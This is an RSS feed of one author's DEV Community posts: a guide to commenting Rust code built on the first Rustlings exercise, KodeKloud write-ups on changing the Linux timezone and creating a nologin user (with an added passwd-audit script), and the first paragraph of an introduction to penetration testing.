<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Artur Serra</title>
    <description>The latest articles on DEV Community by Artur Serra (@arturserra).</description>
    <link>https://dev.to/arturserra</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F320912%2Ffe3fc866-2e46-45c5-8ff5-a01fcfbfd31a.jpg</url>
      <title>DEV Community: Artur Serra</title>
      <link>https://dev.to/arturserra</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/arturserra"/>
    <language>en</language>
    <item>
      <title>Rustlings #1 (Or The Power of Comments in Programming)</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Sat, 18 Mar 2023 17:07:45 +0000</pubDate>
      <link>https://dev.to/arturserra/rustlings-1-or-the-power-of-comments-in-programming-4705</link>
      <guid>https://dev.to/arturserra/rustlings-1-or-the-power-of-comments-in-programming-4705</guid>
      <description>&lt;p&gt;The first &lt;a href="https://dev.tourl"&gt;Rustling&lt;/a&gt; challenge shows us how comments are an essential part of programming, bringing - in one way or another - numerous benefits to developers and teams. They serve as a form of documentation that makes it easier for developers to understand the code by providing context, clarity, and explanations of how the code works, helping developers to save time and effort by reducing the need to decipher code and allowing them to focus on the actual problem-solving.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;(Original post on - &lt;a href="https://www.therustyco.de/post/rustlings-1-or-the-power-of-comments-in-programming"&gt;https://www.therustyco.de/post/rustlings-1-or-the-power-of-comments-in-programming&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. Introduction
&lt;/h2&gt;

&lt;p&gt;Comments are an essential and often overlooked part of programming, especially in complex projects where there can be a lot of code to navigate. They serve as a form of documentation that makes it easier for developers to understand the code by providing context, clarity, and explanations of how the code works. This helps developers to save time and effort by reducing the need to decipher code and allowing them to focus on the actual problem solving. In addition, comments can also help to identify potential issues, highlight tricky code, and provide insights into why certain decisions were made during the development process.&lt;/p&gt;

&lt;p&gt;In this blog post, we will explore the importance of commenting code and the benefits that it can bring to developers in more detail. We will delve deeper into the different types of comments, such as single-line and multi-line comments, and provide examples of how they can be used effectively. We will also discuss self-documented code, which is code that is written in a way that is easy to read and understand, even without comments. By understanding the importance of self-documented code, you can write code that is not only functional but also easy to understand.&lt;/p&gt;

&lt;p&gt;Furthermore, we will cover the best practices for commenting code. By following these methods, you can ensure that your comments are consistent, easy to read and effective. Then, we’ll take a look at some examples of tricky code, and at how commenting can be important to make code understandable in that scenario.&lt;/p&gt;

&lt;p&gt;By following these best practices, you can write code that is well-documented, easy to understand, and maintainable for years to come. With comments, you can ensure that your code is readable and maintainable by others (or the future you). This is especially important when working on a team, as it can lead to better collaboration and more efficient development. By the end of this post, you will have a deeper understanding of how comments can benefit your development process and how to write efficient code with comments.&lt;/p&gt;

&lt;p&gt;In the first Rustling challenge, we face a task that is simple for most experienced programmers, but may not be so simple for beginners: remove a comment from the code. However, even more experienced programmers don’t fully understand all the implications and strategies of commenting their code, which can be detrimental to their collaborative work with their teammates.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;// intro1.rs&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// About this `I AM NOT DONE` thing:
// We sometimes encourage you to keep trying things on a given exercise, even
// after you already figured it out. If you got everything working and feel
// ready for the next exercise, remove the `I AM NOT DONE` comment below.
// Execute `rustlings hint intro1` or use the `hint` watch subcommand for a hint.
//
// If you're running this using `rustlings watch`: The exercise file will be reloaded
// when you change one of the lines below! Try adding a `println!` line, or try changing
// what it outputs in your terminal. Try removing a semicolon and see what happens!

// I AM NOT DONE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To complete this challenge, simply remove the whole line that states &lt;code&gt;// I AM NOT DONE&lt;/code&gt;, and you should be good to go. Quite simple, right? More or less. Commenting code can be a bit more challenging than that, and that’s what I will explain to you in this post!&lt;/p&gt;

&lt;h2&gt;
  
  
  II. Comment the Method
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why is it important?
&lt;/h3&gt;

&lt;p&gt;Documenting code is an essential part of programming, as it allows developers to understand the functionality and purpose of the code. However, simply commenting the code inside a method may not be enough to provide a complete understanding of the method's purpose and functionality. This is why it is important to also comment the method itself, providing context and a higher-level overview of its purpose within the codebase.&lt;/p&gt;

&lt;p&gt;By commenting both the method and the code inside it, developers can gain a profound understanding of its purpose and how it contributes to the overall functionality of the codebase. This information can help other developers understand how it fits into the larger codebase and how they can use it in their own code. In addition, a method comment can also provide information about any of its potential issues or limitations, which can be useful when debugging or modifying the code.&lt;/p&gt;

&lt;p&gt;Commenting just the code inside a method can be helpful for understanding how the code works, but it may not provide a complete understanding of the purpose and functionality it provides. Without a method comment, other developers may have to spend more time deciphering what the method actually does, and less time fixing or improving it. By adding comments above and inside the method, developers can save time and effort by quickly understanding what the method does and how it contributes to the overall functionality of the code.&lt;/p&gt;

&lt;p&gt;But commenting can also help with code maintenance. If a developer needs to modify or update the codebase, they can use the method comments to quickly understand the purpose of the method and any potential implications of modifying it. This can help prevent unintended consequences and make the modification process more efficient, ensuring that the codebase remains maintainable and understandable, even as it is updated and modified over time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Best practices for commenting the method
&lt;/h3&gt;

&lt;p&gt;Good method comments use clear and concise language that describes the method's purpose and functionality. They should include information about the inputs and outputs of the method, as well as any potential issues or limitations. Method comments should also be consistent with the formatting and style used throughout the codebase. This can help to make the codebase more maintainable and easier to understand for other developers. Additionally, adding examples that demonstrate how to use the method can be very helpful, especially for developers who are new to the codebase.&lt;/p&gt;

&lt;p&gt;Bad method comments, on the other hand, are vague and may not provide enough information about the method's purpose and functionality. They may also use abbreviated or unclear names for the method, which can make it harder for other developers to understand what the method actually does. Comments that are too long or irrelevant can also be unhelpful, especially if they don't provide any useful information about the method's purpose or functionality.&lt;/p&gt;

&lt;p&gt;When commenting a method in Rust programming, it is important to use clear and concise language that describes the method's purpose and functionality. The following are examples of good and bad method comments:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Good Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// This is the main function. It will print a sentence in the console.
// The code should not take any arguments; it will simply run the
// print line - println! - macro.
fn main() {
    // Statements here are executed when the compiled binary is called.

    // Print text to the console.
    println!("Hello World!");
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here we have an example of the simplest code you could write in Rust, probably. A simple Hello World being printed to the console. But in this case, we added some documentation for other developers to understand what is actually going on in this method, and what we expect it to do. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bad Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// This prints text
fn main() {
    println!("Hello World")
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this other method, the comment is too vague and does not provide enough information about the method's purpose and functionality. It prints something, but where? In the console? On an actual printer? On the screen? It also does not include any information about the inputs or outputs of the method: whether it should take anything, or what it should return.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Good Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/// Returns the average of a vector of integers.
///
/// The result uses integer division, so it is truncated toward zero.
///
/// # Arguments
///
/// * `numbers` - A vector of 32-bit integers.
///
/// # Panics
///
/// Panics with a division by zero if `numbers` is empty.
///
/// # Examples
///
/// ```
/// let numbers = vec![1, 2, 3, 4, 5];
/// let result = calculate_average(numbers);
/// assert_eq!(result, 3);
/// ```
fn calculate_average(numbers: Vec&amp;lt;i32&amp;gt;) -&amp;gt; i32 {
    let sum = numbers.iter().sum::&amp;lt;i32&amp;gt;();
    let count = numbers.len() as i32;
    let average = sum / count;

    return average;
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this other case, we have a detailed set of instructions, explaining in detail the functionality of this method. It also states what arguments should be passed, what should be expected in return, and even gives some usage examples.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bad Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/// Calculates the average of a vector.
fn avg(numbers: Vec&amp;lt;i32&amp;gt;) -&amp;gt; i32 {
    let sum = numbers.iter().sum::&amp;lt;i32&amp;gt;();
    let count = numbers.len() as i32;
    let avg = sum / count;

    return avg;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For this method, everything looks like a mess! An abbreviated name (which is even worse in the next subject, Self-Documenting Code), a vague description and no clue at all about what is being passed and what we should expect to see returned.&lt;/p&gt;

&lt;h2&gt;
  
  
  III. Self-Documenting Code
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is self-documenting code?
&lt;/h3&gt;

&lt;p&gt;We’ve been talking a lot about displaying the functionalities of the code in the comments, right? The self-documenting code is a concept that refers to writing code in a way that conveys its purpose and functionality without the need for additional comments. This is achieved by using descriptive variable and function names, breaking up complex code into smaller, more manageable pieces, and using consistent formatting and indentation. When code is self-documenting, it becomes easier for other developers to read and understand, reducing the need for comments and making the codebase more maintainable.&lt;/p&gt;

&lt;p&gt;Writing self-documenting code has many advantages that can make developers’ lives easier. For one, it makes the code effortless to read and understand. When code is written with descriptive names for variables and functions, the process of understanding what each part of the code does becomes straightforward and painless. This can lead to faster development times since developers can more quickly and easily get the gist of the codebase.&lt;/p&gt;

&lt;p&gt;Additionally, self-documenting code can reduce the need for comments. Comments can be helpful, but they can also become outdated or misleading if the code they describe is changed. Let’s say you update a method for something else, but forget to update its comments. The next developer who touches the codebase will then find a piece of “lying” code that can slow down their process. With self-documenting code, the code itself becomes the documentation, making it easier for other developers to understand and modify the code without the need for any additional comments. When code is self-documenting, developers can spend less time writing and updating comments and more time focusing on writing high-quality, maintainable code, which can lead to better and more efficient workflows. When code is written in a clear and concise way, it becomes easier for new developers to get up to speed and start contributing to the project, from junior to senior levels!&lt;/p&gt;

&lt;h3&gt;
  
  
  What are the best practices for writing self-documenting code?
&lt;/h3&gt;

&lt;p&gt;When writing self-documenting code, there are several best practices that can help to make the code easier to read and understand. These include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Using meaningful variable and function names: Variable and function names should be descriptive and convey their purpose and functionality. Avoid using names that are too short or unclear, as this can make the code harder to understand.&lt;/li&gt;
&lt;li&gt;Avoiding abbreviations and acronyms: While abbreviations and acronyms can be useful for saving space, they can also be confusing to other developers who may not be familiar with them. Where possible, use full and descriptive names for variables and functions.&lt;/li&gt;
&lt;li&gt;Breaking up complex code into smaller, more manageable pieces: Complex code can be difficult to read and understand, especially if it is all contained in a single function or method. To make the code easier to read, consider breaking it up into smaller, more manageable pieces. This can also make the code easier to test and debug.&lt;/li&gt;
&lt;li&gt;Using consistent formatting and indentation: Consistent formatting and indentation can make the code easier to read and understand, especially when working with a team of developers. Use a consistent style for variable and function names, as well as for indentation and line breaks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Examples of self-documenting code
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Good Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fn calculate_average(numbers: &amp;amp;[i32]) -&amp;gt; i32 {
    let sum: i32 = numbers.iter().sum();
    let count = numbers.len() as i32;
    let average = sum / count;
    average
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this example, we have a simple function that calculates the average of a list of integers. The function name &lt;em&gt;&lt;strong&gt;calculate_average&lt;/strong&gt;&lt;/em&gt; is descriptive and conveys its purpose. The function takes a slice of integers as an argument, which also has an explanatory name. The function uses &lt;em&gt;&lt;strong&gt;&amp;amp;[i32]&lt;/strong&gt;&lt;/em&gt; instead of &lt;em&gt;&lt;strong&gt;Vec&lt;/strong&gt;&lt;/em&gt; as its input parameter, which is more efficient (the caller keeps ownership of its data) and more readable. The variable names within the function are also descriptive and easy to understand, making it clear what each variable represents. The return statement is also clear and concise.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Good Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fn is_valid_name(name: &amp;amp;str) -&amp;gt; bool {
    name.chars().all(|c| c.is_ascii_alphabetic() || c == ' ')
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function checks whether a given string is a valid name. The function name &lt;em&gt;&lt;strong&gt;is_valid_name&lt;/strong&gt;&lt;/em&gt; effectively communicates the function's intended purpose. It takes a string slice as an argument, which is also a descriptive name. The function uses the &lt;em&gt;&lt;strong&gt;chars&lt;/strong&gt;&lt;/em&gt; method to iterate over each character in the string, and the &lt;em&gt;&lt;strong&gt;all&lt;/strong&gt;&lt;/em&gt; method to check if every character meets a certain condition. The condition is notably comprehensible and straightforward to grasp.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Good Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let sentence = "The quick brown fox jumps over the lazy dog.";
let words: Vec&amp;lt;&amp;amp;str&amp;gt; = sentence.split(' ').collect();
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this example, we have a simple piece of code that splits a &lt;em&gt;&lt;strong&gt;sentence&lt;/strong&gt;&lt;/em&gt; into &lt;em&gt;&lt;strong&gt;words&lt;/strong&gt;&lt;/em&gt;. The variable names &lt;em&gt;sentence&lt;/em&gt; and &lt;em&gt;words&lt;/em&gt; convey the meaning of the variables through quite descriptive naming. The &lt;em&gt;&lt;strong&gt;split&lt;/strong&gt;&lt;/em&gt; method is used to split the sentence into words at every space character, and the resulting words are collected into a vector. The code is clear and concise, making it easy to understand what is happening.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bad Example&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;fn f(x: i32, y: i32) -&amp;gt; i32 {
    let a = x * y;
    let b = a / 2;
    return b;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this instance, we encounter a function that computes the area of a rectangle. The name of the function, "f," fails to sufficiently indicate its intended operation. Furthermore, the names of the variables, "a" and "b," fail to provide any insight into their intended use. Additionally, the code within the function lacks self-documentation, thereby obscuring the specific calculation being performed.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. Commenting Tricky Stuff
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why it is important to comment tricky or non-obvious parts of the code
&lt;/h3&gt;

&lt;p&gt;Tricky or non-obvious parts of the code can make it difficult for other developers to understand how the code works. These parts of the code may be essential to the functionality of the program, but without proper comments, they can be difficult to decipher.&lt;/p&gt;

&lt;p&gt;For instance, let's say you've developed a program that has a complex algorithm that performs a specific task. It may be difficult for another developer to understand how this algorithm works just by reading the code, even if it has a self-documented approach. By commenting each step of the algorithm, you can help other developers understand how it works, and they can modify or debug the code more efficiently. This will save them time and avoid unnecessary confusion.&lt;/p&gt;

&lt;h3&gt;
  
  
  Best practices for commenting tricky code
&lt;/h3&gt;

&lt;p&gt;One of the most important aspects of writing clean and maintainable code is adding comments to explain the thought process behind it. One best practice to achieve this is to use inline comments. Inline comments can be placed directly next to the code they are commenting on, providing context and explanations for that piece.&lt;/p&gt;

&lt;p&gt;Additionally, another best practice is to add comments to explain unusual or unexpected behavior. This can help other developers understand why certain decisions were made during the development process and how they might impact the codebase. It is important to keep in mind that not all developers are familiar with the same programming concepts or methodologies, so adding comments can make it easier for everyone to understand the code.&lt;/p&gt;

&lt;p&gt;Highlighting any potential pitfalls or edge cases is also important, as it can help other developers avoid common mistakes and errors. By providing clear explanations and examples of what can go wrong, developers can be better equipped to handle any issues that may arise during the development process.&lt;/p&gt;

&lt;p&gt;In summary, adding comments to explain the thought process behind the code, including inline comments, comments to explain unusual or unexpected behavior, and highlighting potential pitfalls or edge cases, is crucial for writing maintainable and understandable code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Examples of tricky code and how to comment it effectively
&lt;/h3&gt;

&lt;p&gt;One example of tricky code is code that uses recursion. Recursion can be difficult to understand and may require additional comments to explain how the recursive function works. Adding comments that explain the recursion logic, the base case, and the exit conditions can help other developers understand how the function works and how it contributes to the overall functionality of the codebase.&lt;/p&gt;

&lt;p&gt;Another example of tricky code is code that involves complex algorithms or data structures. In these cases, it can be helpful to add comments that explain how the algorithm or data structure works, as well as any potential issues or limitations. This can help other developers understand how the code works and how they can modify it to fit their needs.&lt;/p&gt;

&lt;p&gt;Code that involves external libraries or frameworks can also be tricky to understand. In these cases, adding comments that explain how the code integrates with the library or framework can be helpful. This can help other developers understand how the code works and how it interacts with the external codebase.&lt;/p&gt;

&lt;p&gt;Finally, code that uses unusual or unexpected syntax or language features can also be tricky to understand. In these cases, adding comments that explain the syntax or features can be helpful. This can help other developers understand how the code works and how it contributes to the overall functionality of the codebase.&lt;/p&gt;

&lt;p&gt;By following these best practices, you can ensure that tricky or non-obvious parts of the code are well-documented and easy to understand. This can help other developers modify and debug the code more efficiently and effectively, leading to a more maintainable and understandable codebase.&lt;/p&gt;

&lt;h2&gt;
  
  
  V. Conclusion
&lt;/h2&gt;

&lt;p&gt;In conclusion, commenting code is an essential part of programming that can bring numerous benefits to developers and teams. By providing context, clarity, and explanations of how the code works, comments can save time and effort by reducing the need to decipher code and allowing developers to focus on problem-solving. Comments can also help to identify potential issues, highlight tricky code, and provide insights into why certain decisions were made during the development process.&lt;/p&gt;

&lt;p&gt;In this blog post, we explored the importance of commenting code and the benefits of doing so. We delved deeper into the different types of comments and provided examples of how they can be used effectively. We also discussed self-documented code and best practices for commenting code, including commenting the method, writing self-documenting code, and commenting tricky code.&lt;/p&gt;

&lt;p&gt;We hope that this post has been helpful in encouraging you to start commenting your code more effectively. By following the best practices outlined in this post, you can ensure that your code is well-documented, easy to understand, and maintainable for years to come. Remember to use clear and concise language, avoid abbreviations and acronyms, break up complex code, and use consistent formatting and indentation.&lt;/p&gt;

&lt;p&gt;In order to improve the maintainability and understandability of our codebases, it's important to adopt a more effective commenting strategy. By commenting our code more thoroughly, we can provide valuable guidance to other developers who may need to work with our code in the future. This can help to prevent confusion and errors, ultimately saving time and resources. Additionally, effective commenting can make our codebases more accessible to developers who may not be familiar with the specific technologies or design patterns we're working with. By explaining our thought processes and providing clear explanations of complex concepts, we can help ensure that our code can be understood and maintained by a wider range of developers. So, let's prioritize effective commenting as a key part of our development process moving forward!&lt;/p&gt;

</description>
      <category>rust</category>
      <category>programming</category>
      <category>rustlings</category>
      <category>beginners</category>
    </item>
    <item>
      <title>Write-up: KodeKloud Sysadmin (Set or Change System's Timezone in Linux)</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Wed, 16 Jun 2021 18:19:17 +0000</pubDate>
      <link>https://dev.to/arturserra/write-up-kodekloud-sysadmin-set-or-change-system-s-timezone-in-linux-2791</link>
      <guid>https://dev.to/arturserra/write-up-kodekloud-sysadmin-set-or-change-system-s-timezone-in-linux-2791</guid>
      <description>&lt;p&gt;In this task, proposed &lt;a href="https://www.kodekloud-engineer.com"&gt;here&lt;/a&gt;, the sysadmin has to change the system's timezone to Australia/Brisbane. In this post, we'll go through the process of doing so on recent Linux distributions (those that use systemd, which provides the &lt;code&gt;timedatectl&lt;/code&gt; command).&lt;/p&gt;

&lt;p&gt;For starters, you gotta check which timezone your system is currently set to. Usually it's defined during the installation process, and it's important for a lot of system-related processes and tasks, like cron jobs and application logs. To view your current timezone, run the command:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;$ timedatectl&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;It should return to you a lot of information related to your system's clock, reference time and timezone, like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Local time: Wed 2021-06-16 15:04:41 -03   
Universal time: Wed 2021-06-16 18:04:41 UTC   
RTC time: Wed 2021-06-16 18:04:41       
Time zone: America/Fortaleza (-03, -0300)
System clock synchronized: yes 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(Remember, if you feel lost during this walk-through, just run &lt;code&gt;timedatectl --help&lt;/code&gt; to get more information on how to correctly change your system's timezone!)&lt;/p&gt;

&lt;p&gt;Now that you already know your current timezone, it's time to run:&lt;br&gt;
&lt;code&gt;$ timedatectl list-timezones&lt;/code&gt; &lt;br&gt;
to check the exact name for your new timezone. For the purposes of this tutorial, let's stick to &lt;em&gt;Europe/Oslo&lt;/em&gt;. We just need to find it in the list (which is quite extensive!) and copy it. If you already know the exact name of the timezone you gotta change your system to, you can just skip to the next step.&lt;/p&gt;

&lt;p&gt;Now, run:&lt;br&gt;
&lt;code&gt;$ timedatectl set-timezone Europe/Oslo&lt;/code&gt;&lt;br&gt;
and it'll change the timezone instantly (this is a privileged change, so you may need to run it as root or with &lt;code&gt;sudo&lt;/code&gt;).&lt;br&gt;
Run again:&lt;br&gt;
&lt;code&gt;$ timedatectl&lt;/code&gt;&lt;br&gt;
and your output should be more or less like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Local time: Wed 2021-06-16 20:16:59 CEST
Universal time: Wed 2021-06-16 18:16:59 UTC 
RTC time: Wed 2021-06-16 18:16:59     
Time zone: Europe/Oslo (CEST, +0200)   
System clock synchronized: yes                         
NTP service: active                      
RTC in local TZ: no  
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
    </item>
    <item>
      <title>Write-up: KodeKloud Sysadmin (Create a Non-interactive Shell)</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Wed, 09 Jun 2021 17:55:41 +0000</pubDate>
      <link>https://dev.to/arturserra/write-up-kodekloud-sysadmin-create-a-non-interactive-shell-1lfg</link>
      <guid>https://dev.to/arturserra/write-up-kodekloud-sysadmin-create-a-non-interactive-shell-1lfg</guid>
      <description>&lt;p&gt;In this task, proposed &lt;a href="https://www.kodekloud-engineer.com/"&gt;here&lt;/a&gt;, the sysadmin has to create a new user with a non-interactive shell. The full prompt goes as follows:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The System admin team of xFusionCorp Industries has installed a backup agent tool on all app servers. As per the tool's requirements they need to create a user with a non-interactive shell. Therefore, create a user named mark with a non-interactive shell in the app02 server.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;To do so, we need to understand two commands in the Linux lexicon: &lt;strong&gt;ssh&lt;/strong&gt; and &lt;strong&gt;adduser&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;First, let's use the &lt;strong&gt;ssh&lt;/strong&gt; command to log into the server specified in the prompt. You can use either&lt;/p&gt;

&lt;p&gt;&lt;code&gt;ssh -l user server&lt;/code&gt;&lt;br&gt;
or&lt;br&gt;
&lt;code&gt;ssh user@server&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;(Remember to replace &lt;strong&gt;user&lt;/strong&gt; with your actual ssh username and &lt;strong&gt;server&lt;/strong&gt; with your actual ssh server name).&lt;/p&gt;

&lt;p&gt;Once we log into the specified server, we are able to create a new user with a non-interactive shell, as prompted before. In this case, we'll need to use a flag of the &lt;code&gt;adduser&lt;/code&gt; command: &lt;strong&gt;-s&lt;/strong&gt;. Note that &lt;code&gt;adduser&lt;/code&gt; differs between distributions: on Red Hat-style systems it is a link to &lt;code&gt;useradd&lt;/code&gt; and accepts &lt;strong&gt;-s&lt;/strong&gt;, while the Debian &lt;code&gt;adduser&lt;/code&gt; front-end documents this option as &lt;strong&gt;--shell&lt;/strong&gt;, so check the manual page on the system you are on. According to adduser's manual page, the option means:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;--shell SHELL&lt;br&gt;
Use SHELL as the user's login shell, rather than the default specified by the configuration file.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;As it says, it sets the login shell of the newly created user. We need a non-interactive shell, which means that we need to set the user's shell to &lt;strong&gt;/sbin/nologin&lt;/strong&gt;. When we do so, it prevents the user from logging in. The nologin manual page itself puts it this way:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;nologin - politely refuse a login&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The full command we need to run is a combination of:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;sudo&lt;/strong&gt; - Run the command with administrative privileges, since only root can modify the account database.&lt;br&gt;
&lt;strong&gt;adduser&lt;/strong&gt; - The command that creates the new user.&lt;br&gt;
&lt;strong&gt;-s&lt;/strong&gt; - The option that sets the new user's login shell.&lt;br&gt;
&lt;strong&gt;/sbin/nologin&lt;/strong&gt; - The path to the nologin program (a program, not a directory, so no trailing slash); use /usr/sbin/nologin on Debian-family systems.&lt;br&gt;
&lt;strong&gt;mark&lt;/strong&gt; - The username requested in the task.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;sudo adduser -s /sbin/nologin mark&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Check the result before you close the session: &lt;code&gt;getent passwd mark | cut -d: -f7&lt;/code&gt; should print &lt;code&gt;/sbin/nologin&lt;/code&gt;, and &lt;code&gt;sudo su - mark&lt;/code&gt; should answer with "This account is currently not available." instead of a prompt.&lt;/p&gt;
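&lt;p&gt;Because a non-interactive shell only helps if it is actually in place, here is an added example, not part of the original post, of the check a sysadmin would run afterwards. It is a small POSIX shell script that reads passwd-formatted data and reports which accounts still get an interactive shell; the sample passwd lines in it are constructed, and on a real server you feed it the output of &lt;code&gt;getent passwd&lt;/code&gt; instead.&lt;/p&gt;

```sh
#!/bin/sh
# Added example: audit which accounts in passwd-formatted data can get an
# interactive login shell. Not part of the original post; the sample data
# below is constructed, not taken from a real server.

# Constructed sample: one privileged account, two service accounts (mark
# and backup) with nologin shells, and a stray account that kept bash.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
mark:x:1002:1002::/home/mark:/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:1003:1003::/home/svc:/bin/bash'

# Return 0 when the given shell path is one of the usual non-interactive
# shells. /etc/shells is deliberately not consulted: nologin is normally kept
# out of it so such accounts cannot use chsh or ftp either.
is_noninteractive_shell() {
  case "$1" in
    /sbin/nologin|/usr/sbin/nologin|/bin/false|/usr/bin/false) return 0 ;;
    *) return 1 ;;
  esac
}

# Print the login shell (7th field) of user $1 from the passwd data in $2.
user_shell() {
  printf '%s\n' "$2" | awk -F: -v u="$1" '$1 == u { print $7; exit }'
}

# Print, one per line, the accounts in $1 whose shell is interactive.
interactive_accounts() {
  printf '%s\n' "$1" | awk -F: '$7 !~ /(nologin|false)$/ { print $1 }'
}

# Usage on a live box (the creation step needs root, e.g. via sudo):
#   sudo useradd -s /sbin/nologin mark         # what adduser runs on RHEL-family
#   interactive_accounts "$(getent passwd)"    # every name printed needs a reason
interactive_accounts "$SAMPLE_PASSWD"
```

&lt;p&gt;Every account the last function prints should have a reason to exist; a backup agent's account showing up there means the task was not done right.&lt;/p&gt;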

</description>
    </item>
    <item>
      <title>Getting started with Penetration Testing and building your own pentest methodology.</title>
      <dc:creator>Artur Serra</dc:creator>
      <pubDate>Tue, 09 Mar 2021 01:18:47 +0000</pubDate>
      <link>https://dev.to/arturserra/getting-started-with-penetration-testing-and-building-your-own-pentest-methodology-498a</link>
      <guid>https://dev.to/arturserra/getting-started-with-penetration-testing-and-building-your-own-pentest-methodology-498a</guid>
      <description>&lt;h1&gt;
  
  
  What is Pentesting?
&lt;/h1&gt;

&lt;p&gt;Protecting your business by attacking it yourself is a complex and time-consuming discipline. This kind of preventive defense has many faces and categories, but one of the best known is Penetration Testing (or Pentesting): a formal procedure aimed at discovering flaws, risks and vulnerabilities in a company's security posture, within a predefined scope. The pentester simulates an attack against a network, application or system in order to find and exploit those vulnerabilities, usually in a loud, noisy way and in coordination with the Blue Team/security teams inside the company (if any). No network, application or system can be made impenetrable, but the pentester's findings let you make it considerably harder for bad actors to break through your fences.&lt;/p&gt;

&lt;h1&gt;
  
  
  What is the need of a Penetration Test?
&lt;/h1&gt;

